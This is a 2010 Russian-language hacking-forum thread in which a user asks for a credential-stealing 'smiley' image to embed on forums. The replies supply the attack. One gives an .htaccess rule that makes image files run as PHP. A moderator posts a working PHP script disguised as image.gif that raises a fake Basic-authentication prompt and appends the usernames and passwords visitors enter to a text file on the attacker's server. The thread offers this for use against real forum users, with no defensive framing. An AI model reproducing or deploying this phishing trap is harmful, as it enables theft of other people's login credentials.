HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу xss
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

xss
  #1  
Старый 13.03.2010, 01:16
n1ck
Новичок
Регистрация: 06.09.2007
Сообщений: 8
Провел на форуме:
63181

Репутация: 4
Отправить сообщение для n1ck с помощью ICQ
Question xss
поделитесь файликом или напомните как называется у меня где то было на компе найти не могу или потер случайно в общем суть такая
есть там картинка с кодом и файл htaccess
эта картинка выглядит как смайл при вставке ссылки на форуме или на сайте выскакивает окошко с просьбой ввести логин и пароль при вводе он сохраняет логин и пароль на сервере где картинка.
если можете прикрепите файл или напомните как называеться
 
Ответить с цитированием

  #2  
Старый 13.03.2010, 01:28
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию
В htaccess добавляешь (точно не помню, но вроде это):
AddType application/x-httpd-php .jpg

Далее гуглишь как вызвать basic авторизацию на php, ну и собственно кладешь скрипт (с basic авторизацией) в .jpg "формат" на сервере, и даешь эту jpg своему другу к примеру
 
Ответить с цитированием

  #3  
Старый 13.03.2010, 01:38
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию
image.gif
PHP код:
<?
    $filevalid    'base.txt';
    $good        fopen($filevalid'a+');
header("WWW-Authenticate: Basic realm=\"Access Forbidden - Private level\"");
header("HTTP/1.0 401 Access Forbidden");
if (isset($_SERVER["PHP_AUTH_USER"]) ) {
$user $_SERVER["PHP_AUTH_USER"];
$pass $_SERVER["PHP_AUTH_PW"];
fwrite ($good$user.';'.$pass."\n");
header("HTTP/1.0 200");
//exit("test");
}

?>

.htaccess
PHP код:
<files "image.gif">
AddType application/x-httpd-php .gif
</files

base.txt (с правами 777)
PHP код:
 
Ответить с цитированием

  #4  
Старый 13.03.2010, 01:54
n1ck
Новичок
Регистрация: 06.09.2007
Сообщений: 8
Провел на форуме:
63181

Репутация: 4
Отправить сообщение для n1ck с помощью ICQ
По умолчанию
Спасибо большой за помощь
 
Ответить с цитированием

  #5  
Старый 13.03.2010, 02:01
n1ck
Новичок
Регистрация: 06.09.2007
Сообщений: 8
Провел на форуме:
63181

Репутация: 4
Отправить сообщение для n1ck с помощью ICQ
По умолчанию
Вот кстате я такой архивчик искал
http://forum4game.freetzi.com/images/
не у кого нету?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Веб-уязвимости 519 23.09.2021 11:44
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss: Cегодня и вчера. Опрос Constantine Болталка 48 07.12.2009 08:57
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ